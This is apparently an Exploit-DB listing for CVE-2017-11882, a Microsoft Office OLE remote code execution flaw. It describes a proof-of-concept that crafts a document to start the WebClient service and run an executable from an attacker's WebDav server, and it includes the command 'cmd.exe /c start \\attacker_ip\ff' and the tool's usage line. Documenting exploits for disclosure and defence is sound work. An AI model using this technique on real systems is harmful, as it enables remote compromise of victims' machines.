Microsoft Office - OLE Remote Code Execution

EDB-ID: 43163
Author: embedi
Published: 2017-11-20
CVE: CVE-2017-11882
Type: Remote
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A


MITRE CVE-2017-11882:


Patch analysis:

DEMO PoC exploitation:

webdav_exec CVE-2017-11882

A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution.

The first command which triggers WebClient service start may look like this:

cmd.exe /c start \\attacker_ip\ff
Attacker controlled binary path should be a UNC network path:

Usage -u trigger_unc_path -e executable_unc_path -o output_file_name
Sample exploit for CVE-2017-11882 (starting calc.exe as payload)

example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system.

Proof of Concept:

Related Posts